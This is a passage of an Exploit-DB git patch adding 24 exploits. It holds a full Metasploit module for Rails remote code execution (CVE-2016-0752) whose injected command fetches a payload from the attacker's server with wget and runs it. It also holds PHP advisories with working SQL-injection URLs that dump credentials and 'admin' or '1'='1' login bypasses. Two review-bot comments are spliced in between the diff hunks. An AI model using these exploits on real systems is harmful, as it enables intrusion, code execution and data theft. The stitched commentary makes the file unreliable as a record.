From 558ab1fc677e64308ca9aa9ea99f2aa4b55837ae Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 18 Oct 2016 05:01:18 +0000 Subject: [PATCH] DB: 2016-10-18 24 new exploits Entrepreneur Job Portal Script - SQL Injection Entrepreneur Job Portal Script 2.06 - SQL Injection NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation HP Client - Automation Command Injection / Remote Code Execution HP Client 9.1/9.0/8.1/7.9 - Command Injection NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation Firefox 49.0.1 - Denial of Service Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation Student Information System (SIS) 0.1 - Authentication Bypass Web Based Alumni Tracking System 0.1 - SQL Injection Simple Dynamic Web 0.1 - SQL Injection Learning Management System 0.1 - Authentication Bypass Fashion Shopping Cart 0.1 - SQL Injection Health Record System 0.1 - Authentication Bypass Windows x64 - WinExec() Shellcode (93 bytes) Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation PHP Telephone Directory - Multiple Vulnerabilities Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting PHP Image Database - Multiple Vulnerabilities Simple Shopping Cart Application 0.1 - SQL Injection PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin) School Full CBT 0.1 - SQL Injection PHP Business Directory - Multiple Vulnerabilities Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes) Ruby on Rails - Dynamic Render File Upload Remote Code Execution Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125) --- files.csv | 30 ++- platforms/multiple/remote/40561.rb | 200 +++++++++++++++++++ platforms/php/webapps/40479.txt | 1 - 
platforms/php/webapps/40542.txt | 68 +++++++ platforms/php/webapps/40543.txt | 68 +++++++ platforms/php/webapps/40544.txt | 55 +++++ platforms/php/webapps/40545.txt | 85 ++++++++ platforms/php/webapps/40546.txt | 45 +++++ platforms/php/webapps/40547.txt | 54 +++++ platforms/php/webapps/40552.txt | 103 ++++++++++ platforms/php/webapps/40553.txt | 249 +++++++++++++++++++++++ platforms/php/webapps/40554.txt | 75 +++++++ platforms/php/webapps/40555.txt | 51 +++++ platforms/php/webapps/40557.html | 58 ++++++ platforms/php/webapps/40558.txt | 45 +++++ platforms/php/webapps/40559.txt | 85 ++++++++ platforms/win_x86-64/shellcode/40549.c | 144 +++++++++++++ platforms/win_x86/shellcode/40560.asm | 266 +++++++++++++++++++++++++ platforms/windows/dos/40536.py | 147 ++++++++++++++ platforms/windows/local/40535.txt | 32 +++ platforms/windows/local/40538.txt | 43 ++++ platforms/windows/local/40539.txt | 32 +++ platforms/windows/local/40540.txt | 47 +++++ platforms/windows/local/40541.txt | 31 +++ platforms/windows/local/40550.txt | 45 +++++ platforms/windows/local/40562.cpp | 192 ++++++++++++++++++ 26 files changed, 2247 insertions(+), 4 deletions(-) create mode 100755 platforms/multiple/remote/40561.rb create mode 100755 platforms/php/webapps/40542.txt create mode 100755 platforms/php/webapps/40543.txt create mode 100755 platforms/php/webapps/40544.txt create mode 100755 platforms/php/webapps/40545.txt create mode 100755 platforms/php/webapps/40546.txt create mode 100755 platforms/php/webapps/40547.txt create mode 100755 platforms/php/webapps/40552.txt create mode 100755 platforms/php/webapps/40553.txt create mode 100755 platforms/php/webapps/40554.txt create mode 100755 platforms/php/webapps/40555.txt create mode 100755 platforms/php/webapps/40557.html create mode 100755 platforms/php/webapps/40558.txt create mode 100755 platforms/php/webapps/40559.txt create mode 100755 platforms/win_x86-64/shellcode/40549.c create mode 100755 platforms/win_x86/shellcode/40560.asm create mode 
100755 platforms/windows/dos/40536.py create mode 100755 platforms/windows/local/40535.txt create mode 100755 platforms/windows/local/40538.txt create mode 100755 platforms/windows/local/40539.txt create mode 100755 platforms/windows/local/40540.txt create mode 100755 platforms/windows/local/40541.txt create mode 100755 platforms/windows/local/40550.txt create mode 100755 platforms/windows/local/40562.cpp
diff --git a/files.csv b/files.csv
index 539a0fba6..68f4e6756 100755
--- a/files.csv
+++ b/files.csv
@@ -36597,7 +36597,8 @@ id,file,description,date,author,platform,type,port
 40473,platforms/windows/local/40473.txt,"Comodo Chromodo Browser - Unquoted Service Path Privilege Escalation",2016-10-06,Th3GundY,windows,local,0
 40474,platforms/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote,0
 40475,platforms/php/webapps/40475.txt,"Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)",2016-10-07,Besim,php,webapps,0
-40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
+40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script 2.06 - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
+40539,platforms/windows/local/40539.txt,"NETGATE Registry Cleaner build 16.0.205 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
 40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
 40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
 40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
@@ -36611,7 +36612,7 @@ id,file,description,date,author,platform,type,port
 40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
 40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
 40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
-40491,platforms/multiple/remote/40491.py,"HP Client - Automation Command Injection / Remote Code Execution",2016-10-10,SlidingWindow,multiple,remote,0
+40491,platforms/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote,0
 40492,platforms/php/webapps/40492.html,"Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
 40493,platforms/php/webapps/40493.html,"Spacemarc News - Cross-Site Request Forgery (Add New Post)",2016-10-10,Besim,php,webapps,0
 40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
@@ -36645,5 +36646,28 @@ id,file,description,date,author,platform,type,port
 40530,platforms/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,php,webapps,0
 40531,platforms/php/webapps/40531.txt,"Simple Forum PHP 2.4 - SQL Injection",2016-10-14,"Ehsan Hosseini",php,webapps,0
 40532,platforms/php/webapps/40532.html,"Simple Forum PHP 2.4 - Cross-Site Request Forgery (Edit Options)",2016-10-14,"Ehsan Hosseini",php,webapps,0
-40533,platforms/windows/local/40533.txt,"NO-IP DUC v4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",windows,local,0
+40533,platforms/windows/local/40533.txt,"NO-IP DUC 4.1.1 - Unquoted Service Path Privilege Escalation",2016-10-14,"Ehsan Hosseini",windows,local,0
 40534,platforms/php/webapps/40534.html,"YouTube Automated CMS 1.0.7 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-14,"Arbin Godar",php,webapps,0
+40535,platforms/windows/local/40535.txt,"Wondershare PDFelement 5.2.9 - Unquoted Service Path Privilege Escalation",2016-10-14,"Saeed Hasanzadeh",windows,local,0
+40536,platforms/windows/dos/40536.py,"Firefox 49.0.1 - Denial of Service",2016-10-14,"sultan albalawi",windows,dos,0
+40538,platforms/windows/local/40538.txt,"Graylog Collector 0.4.2 - Unquoted Service Path Privilege Escalation",2016-10-14,"Joey Lane",windows,local,0
+40540,platforms/windows/local/40540.txt,"NETGATE AMITI Antivirus build 23.0.305 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
+40541,platforms/windows/local/40541.txt,"NETGATE Data Backup build 3.0.605 - Unquoted Service Path Privilege Escalation",2016-10-15,Amir.ght,windows,local,0
+40542,platforms/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
+40543,platforms/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
+40544,platforms/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL 
Injection",2016-10-14,lahilote,php,webapps,0
+40545,platforms/php/webapps/40545.txt,"Learning Management System 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
+40546,platforms/php/webapps/40546.txt,"Fashion Shopping Cart 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
+40547,platforms/php/webapps/40547.txt,"Health Record System 0.1 - Authentication Bypass",2016-10-14,lahilote,php,webapps,0
+40549,platforms/win_x86-64/shellcode/40549.c,"Windows x64 - WinExec() Shellcode (93 bytes)",2016-10-17,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0
+40550,platforms/windows/local/40550.txt,"Spy Emergency 23.0.205 - Unquoted Service Path Privilege Escalation",2016-10-17,Amir.ght,windows,local,0
+40552,platforms/php/webapps/40552.txt,"PHP Telephone Directory - Multiple Vulnerabilities",2016-10-16,larrycompress,php,webapps,0
+40553,platforms/php/webapps/40553.txt,"Subrion CMS 4.0.5 - Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting",2016-10-17,"Ahsan Tahir",php,webapps,80
+40554,platforms/php/webapps/40554.txt,"PHP Image Database - Multiple Vulnerabilities",2016-10-16,larrycompress,php,webapps,0
+40555,platforms/php/webapps/40555.txt,"Simple Shopping Cart Application 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
+40557,platforms/php/webapps/40557.html,"PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)",2016-10-16,"Meryem AKDOĞAN",php,webapps,0
+40558,platforms/php/webapps/40558.txt,"School Full CBT 0.1 - SQL Injection",2016-10-14,lahilote,php,webapps,0
+40559,platforms/php/webapps/40559.txt,"PHP Business Directory - Multiple Vulnerabilities",2016-10-17,larrycompress,php,webapps,0
+40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Keylogger Reverse UDP Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0
+40561,platforms/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload Remote Code Execution",2016-10-17,Metasploit,multiple,remote,0
+40562,platforms/windows/local/40562.cpp,"Microsoft 
Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)",2016-10-17,"Google Security Research",windows,local,0
diff --git a/platforms/multiple/remote/40561.rb b/platforms/multiple/remote/40561.rb
new file mode 100755
index 000000000..4882db3fb
--- /dev/null
+++ b/platforms/multiple/remote/40561.rb
@@ -0,0 +1,200 @@ +require 'msf/core' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpServer + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution', + 'Description' => %q{ + This module exploits a remote code execution vulnerability in the explicit render + method when leveraging user parameters. + This module has been tested across multiple versions of Ruby on Rails. + The technique used by this module requires the specified + endpoint to be using dynamic render paths, such as the following example: + + def show + render params[:id] + end + + Also, the vulnerable target will need a POST endpoint for the TempFile upload, this + can literally be any endpoint. This module doesnt use the log inclusion method of + exploitation due to it not being universal enough. Instead, a new code injection + technique was found and used whereby an attacker can upload temporary image files + against any POST endpoint and use them for the inclusion attack. Finally, you only + get one shot at this if you are testing with the builtin rails server, use caution. 
+ }, + 'Author' => + [ + 'mr_me ', # necromanced old bug & discovered new vector rce vector + 'John Poulin (forced-request)' # original render bug finder + ], + 'References' => + [ + [ 'CVE', '2016-0752'], + [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch + [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016 + [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit + ], + 'License' => MSF_LICENSE, + 'Platform' => ['linux', 'bsd'], + 'Arch' => ARCH_X86, + 'Payload' => + { + 'DisableNops' => true, + }, + 'Privileged' => false, + 'Targets' => + [ + [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Oct 16 2016')) + register_options( + [ + Opt::RPORT(3000), + OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]), + OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]), + ], self.class) + end + + def check + + # this is the check for the dev environment + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['URIPATH'], "%2f"), + 'method' => 'GET', + }, 60) + + # if the page controller is dynamically rendering, its for sure vuln + if res and res.body =~ /render params/ + return CheckCode::Vulnerable + end + + # this is the check for the prod environment + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"), + 'method' => 'GET', + }, 60) + + # if we can read files, its likley we can execute code + if res and res.body =~ /ruby/ + return CheckCode::Appears + end + return CheckCode::Safe + end + + def on_request_uri(cli, request) + if (not @pl) + print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") + return + end + print_status("#{rhost}:#{rport} - Sending the 
payload to the server...") + @elf_sent = true + send_response(cli, @pl) + end + + def send_payload + @bd = rand_text_alpha(8+rand(8)) + fn = rand_text_alpha(8+rand(8)) + un = rand_text_alpha(8+rand(8)) + pn = rand_text_alpha(8+rand(8)) + register_file_for_cleanup("/tmp/#{@bd}") + cmd = "wget #{@service_url} -O /tmp/#{@bd};" + cmd << "chmod 755 /tmp/#{@bd};" + cmd << "/tmp/#{@bd}" + pay = "<%=`#{cmd}`%>" + print_status("uploading image...") + data = Rex::MIME::Message.new + data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"') + res = send_request_cgi({ + 'method' => 'POST', + 'cookie' => @cookie, + 'uri' => normalize_uri(datastore['URIPATH'], pn), + 'ctype' => "multipart/form-data; boundary=#{data.bound}", + 'data' => data.to_s + }) + if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/ + @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/ + return true + else + + # this is where we pull the log file + if leak_log + return true + end + end + return false + end + + def leak_log + + # path to the log /proc/self/fd/7 + # this bypasses the extension check + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"), + 'method' => 'GET', + }, 60) + + if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/ + @path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/ + return true + end + return false + end + + def start_http_server + @pl = generate_payload_exe + @elf_sent = false + downfile = rand_text_alpha(8+rand(8)) + resource_uri = '/' + downfile + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost) + else + srv_host = datastore['SRVHOST'] + end + + # do not use SSL for the attacking web server + if datastore['SSL'] + ssl_restore = true + datastore['SSL'] = false + end + + @service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}" + service_url_payload = 
srv_host + resource_uri + print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + datastore['SSL'] = true if ssl_restore + connect + end + + def render_tmpfile + @path.gsub!(/\//, '%2f') + res = send_request_cgi({ + 'uri' => normalize_uri(datastore['URIPATH'], @path), + 'method' => 'GET', + }, 1) + end + + def exploit + print_status("Sending initial request to detect exploitability") + start_http_server + if send_payload + print_good("injected payload") + render_tmpfile + + # we need to delay, for the stager + select(nil, nil, nil, 5) + end + end +end \ No newline at end of file diff --git a/platforms/php/webapps/40479.txt b/platforms/php/webapps/40479.txt index bee9b8624..014be0ff2 100755 --- a/platforms/php/webapps/40479.txt +++ b/platforms/php/webapps/40479.txt @@ -3,7 +3,6 @@ | Software : Entrepreneur Job Portal Script | Version : 2.06 | Vendor : http://www.i-netsolution.com/ - | Demo : http://www.i-netsolution.com/item/entrepreneur-job-portal-script/live_demo/853208 | Date : 07 October 2016 | Author : OoN_Boy [x]========================================================================================================================================[x] diff --git a/platforms/php/webapps/40542.txt b/platforms/php/webapps/40542.txt new file mode 100755 index 000000000..e93aaf9a3 --- /dev/null +++ b/platforms/php/webapps/40542.txt 
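Review bot: `render_tmpfile` assigns the result of `send_request_cgi` to `res` and never reads it, so the local should be dropped or the response code logged; and `exploit` prints `Sending initial request to detect exploitability` immediately before `start_http_server`, which only starts the listener (the detection requests live in `check`), so the message misleads anyone reading the module output. In `send_payload` and `leak_log` the same `Tempfile:\/(.*)>` regex is evaluated twice, once in the `if` condition and again as the trailing `if` guard on the `@path =` line; `@path = $1` inside the branch expresses the same thing with a single match. Two documentation nits in the `%q{}` description and author list: `doesnt` should be `doesn't`, and the `'mr_me '` entry appears to carry a trailing space inside the quotes, probably where an address was stripped.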
@@ -0,0 +1,68 @@ +# Exploit Title............... Student Information System (SIS) Auth Bypass +# Google Dork................. N/A +# Date........................ 14/10/2016 +# Exploit Author.............. lahilote +# Vendor Homepage............. http://www.sourcecodester.com/php/10902/student-information-system-sis.html +# Software Link............... http://www.sourcecodester.com/sites/default/files/download/Bwire%20Charles/ucc.zip +# Version..................... 0.1 +# Tested on................... xampp +# CVE......................... N/A + + +The audit_list in ucc/admin_login.php +------------------------------------- + +----snip---- + +error_reporting(E_ALL ^ E_DEPRECATED); +if(isset($_POST['submit'])) { + +include 'database_config2.php'; +$myusername = $_POST['username']; +$mypassword = $_POST['password']; + + + + +$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'"; +$result = mysql_query($query); +$count = mysql_num_rows($result); +mysql_close(); + +----snip---- + +You can login with username and password: admin' or '1'='1 + + +How to fix +---------- +One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string. +It causes that every of this characters \x00, \n, \r, \, ' +get's replaced with a simple Backslash „/“, so the attackers commands become useless. 
+ + Example: + +error_reporting(E_ALL ^ E_DEPRECATED); +if(isset($_POST['submit'])) { + +include 'database_config2.php'; +$myusername = mysql_real_escape_string($_POST['username']); +$mypassword = mysql_real_escape_string($_POST['password']); + + + + +$query = "SELECT * FROM adminstrator WHERE USERNAME='$myusername' and PASSWORD='$mypassword'"; +$result = mysql_query($query); +$count = mysql_num_rows($result); +mysql_close(); + + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/php/10902/student-information-system-sis.html +http://php.net/manual/en/function.mysql-real-escape-string.php \ No newline at end of file diff --git a/platforms/php/webapps/40543.txt b/platforms/php/webapps/40543.txt new file mode 100755 index 000000000..e2abbbc79 --- /dev/null +++ b/platforms/php/webapps/40543.txt 
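Review bot: The "How to fix" section misdescribes `mysql_real_escape_string`: it prefixes the listed characters with a backslash rather than replacing them with `/`, it requires an open `mysql_*` connection to work at all, and the `mysql_*` extension it belongs to is deprecated since PHP 5.5 and removed in PHP 7, so the shown fix only applies on an end-of-life stack. The remediation a reader should take away is a parameterized query through mysqli or PDO, e.g. `$stmt = $pdo->prepare('SELECT * FROM adminstrator WHERE USERNAME = ? AND PASSWORD = ?'); $stmt->execute([$myusername, $mypassword]);`, and the advisory should also name the cleartext `PASSWORD` comparison as a second finding, with `password_hash`/`password_verify` as the fix. The same "How to fix" wording is repeated in the 40545 and 40547 hunks; the `intval` advice in the 40543, 40544 and 40546 hunks is sound only because those parameters are numeric ids, which the text should state explicitly.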
@@ -0,0 +1,68 @@ +# Exploit Title.............. Web Based Alumni Tracking System Multiple Vulnerability +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/John%20Mark%20Ulep/web-based_alumni_tracking_system.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in /admin/print_employed.php +------------------------------- + +----snip---- + +48 + +----snip---- + +/admin/index.php +---------------- + +----snip---- + +$user = $_POST['username']; +$password = $_POST['password']; + + +$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error()); + +----snip---- + + +Example exploitation +-------------------- +http://server/path_to_webapp/admin/print_employed.php?id=-2%27%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12%20from%20user--+ + +http://server/path_to_webapp/admin/index.php +Login with username and password: admin' or '1'='1 + + +How to fix +---------- +Simple method's use the php function intval and mysql_real_escape_string. 
+ + Example: /admin/print_employed.php + + 48 + + + Example: /admin/index.php + +$user = mysql_real_escape_string($_POST['username']); +$password = mysql_real_escape_string($_POST['password']); + + +$myquery = mysql_query("select * from user where username = '$user' and password = '$password'")or die(mysql_error()); + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/php/10832/web-based-alumni-tracking-system.html +http://php.net/manual/en/function.intval.php +http://php.net/manual/en/function.mysql-real-escape-string.php \ No newline at end of file diff --git a/platforms/php/webapps/40544.txt b/platforms/php/webapps/40544.txt new file mode 100755 index 000000000..c51cab97d --- /dev/null +++ b/platforms/php/webapps/40544.txt 
@@ -0,0 +1,55 @@ +# Exploit Title.............. Simple Dynamic Web SQL Injection +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Chinthaka%20Deshapriya/dynamic_web_page.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in /page.php + +----snip---- + + $prodID = $_GET['prodid']; + + if(!empty($prodID)){ + $sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error()); + $getProdInfo = mysql_fetch_array($sqlSelectSpecProd); + $ptitle = $getProdInfo["title"]; + $pdes = $getProdInfo["description"]; + $pimg = $getProdInfo["imgUrl"]; + } + +----snip---- + +Example exploitation +-------------------- +http://server/path_to_webapp/page.php?prodid=-3%27%20union%20select%201,2,@@version,4--+ + +How to fix +---------- +Simple method's use the php function intval. +For example + + $prodID = intval($_GET['prodid']); + + if(!empty($prodID)){ + $sqlSelectSpecProd = mysql_query("select * from page where id = '$prodID'") or die(mysql_error()); + $getProdInfo = mysql_fetch_array($sqlSelectSpecProd); + $ptitle = $getProdInfo["title"]; + $pdes = $getProdInfo["description"]; + $pimg = $getProdInfo["imgUrl"]; + } + + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/php/10888/simple-dynamic-web-site.html +http://php.net/manual/en/function.intval.php \ No newline at end of file diff --git a/platforms/php/webapps/40545.txt b/platforms/php/webapps/40545.txt new file mode 100755 index 000000000..6d44faa41 --- /dev/null +++ b/platforms/php/webapps/40545.txt 
@@ -0,0 +1,85 @@ +# Exploit Title.............. Learning Management System Auth Bypass +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/php/7339/learning-management-system.html +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/jkev/lms.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in lms/login.php +------------------------------- + +----snip---- + + $username = $_POST['username']; + $password = $_POST['password']; + /* student */ + $query = "SELECT * FROM student WHERE username='$username' AND password='$password'"; + $result = mysql_query($query)or die(mysql_error()); + $row = mysql_fetch_array($result); + $num_row = mysql_num_rows($result); + /* teacher */ + $query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error()); + $num_row_teacher = mysql_num_rows($query_teacher); + $row_teahcer = mysql_fetch_array($query_teacher); + if( $num_row > 0 ) { + +----snip---- + +lms/admin/login.php +------------------- + +----snip---- + + $username = $_POST['username']; + $password = $_POST['password']; + + $query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error()); + $count = mysql_num_rows($query); + $row = mysql_fetch_array($query); + +----snip---- + +You can login with username and password: admin' or '1'='1 + +How to fix +---------- +One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string. +It causes that every of this characters \x00, \n, \r, \, ' +get's replaced with a simple Backslash „/“, so the attackers commands become useless. 
+ + Example: lms/login.php + + $username = mysql_real_escape_string($_POST['username']); + $password = mysql_real_escape_string($_POST['password']); + /* student */ + $query = "SELECT * FROM student WHERE username='$username' AND password='$password'"; + $result = mysql_query($query)or die(mysql_error()); + $row = mysql_fetch_array($result); + $num_row = mysql_num_rows($result); + /* teacher */ + $query_teacher = mysql_query("SELECT * FROM teacher WHERE username='$username' AND password='$password'")or die(mysql_error()); + $num_row_teacher = mysql_num_rows($query_teacher); + $row_teahcer = mysql_fetch_array($query_teacher); + if( $num_row > 0 ) { + + Example: lms/admin/login.php + + $username = mysql_real_escape_string($_POST['username']); + $password = mysql_real_escape_string($_POST['password']); + + $query = mysql_query("SELECT * FROM users WHERE username='$username' AND password='$password'")or die(mysql_error()); + $count = mysql_num_rows($query); + $row = mysql_fetch_array($query); + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/php/7339/learning-management-system.html +http://php.net/manual/en/function.mysql-real-escape-string.php \ No newline at end of file diff --git a/platforms/php/webapps/40546.txt b/platforms/php/webapps/40546.txt new file mode 100755 index 000000000..5070f0cdc --- /dev/null +++ b/platforms/php/webapps/40546.txt 
@@ -0,0 +1,45 @@ +# Exploit Title.............. Fashion Shopping Cart SQL Injection +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/node/10435 +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/aniketsmarty/online_shopping.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in /admin/dd.php +------------------------------- + +----snip---- + +$q=$_GET["q"]; + +$sql="SELECT * FROM subcategory WHERE cat_id ='$q'"; + +----snip---- + +Example exploitation +-------------------- +http://server/path_to_webapp/admin/dd.php?q=-1%27%20union%20select%201,version()--+ + + +How to fix +---------- +Simple method's use the php function intval. +For example + +$q=intval($_GET["q"]); + +$sql="SELECT * FROM subcategory WHERE cat_id ='$q'"; + + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/node/10435 +http://php.net/manual/en/function.intval.php \ No newline at end of file diff --git a/platforms/php/webapps/40547.txt b/platforms/php/webapps/40547.txt new file mode 100755 index 000000000..485dbbca1 --- /dev/null +++ b/platforms/php/webapps/40547.txt 
@@ -0,0 +1,54 @@ +# Exploit Title.............. Health Record System Auth Bypass +# Google Dork................ N/A +# Date....................... 14/10/2016 +# Exploit Author............. lahilote +# Vendor Homepage............ http://www.sourcecodester.com/node/10430 +# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/Jesutoyeboluwatife/vital.zip +# Version.................... 0.1 +# Tested on.................. xampp +# CVE........................ N/A + + +The audit_list in vital/signin.php +------------------------------- + +----snip---- + +if (isset($_POST['submit'])){ + $lga_id=$_POST['lgaid']; +$pw=$_POST['pwd']; +$_SESSION['username'] = $lga_id; + + + $sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' "); + +----snip---- + +You can login with username and password: admin' or '1'='1 + + +How to fix +---------- +One of the method's to fix and secure such Auth Bypass flaw's, is to use the php function mysql_real_escape_string. +It causes that every of this characters \x00, \n, \r, \, ' +get's replaced with a simple Backslash „/“, so the attackers commands become useless. + + Example: + +if (isset($_POST['submit'])){ + $lga_id=mysql_real_escape_string($_POST['lgaid']); +$pw=mysql_real_escape_string($_POST['pwd']); +$_SESSION['username'] = $lga_id; + + + $sql=mysql_query("SELECT * FROM admin WHERE lga_id='$lga_id' AND password='$pw' "); + + +Credits +------- +This vulnerability was discovered and researched by lahilote + +References +---------- +http://www.sourcecodester.com/node/10430 +http://php.net/manual/en/function.mysql-real-escape-string.php \ No newline at end of file diff --git a/platforms/php/webapps/40552.txt b/platforms/php/webapps/40552.txt new file mode 100755 index 000000000..36a676e97 --- /dev/null +++ b/platforms/php/webapps/40552.txt 
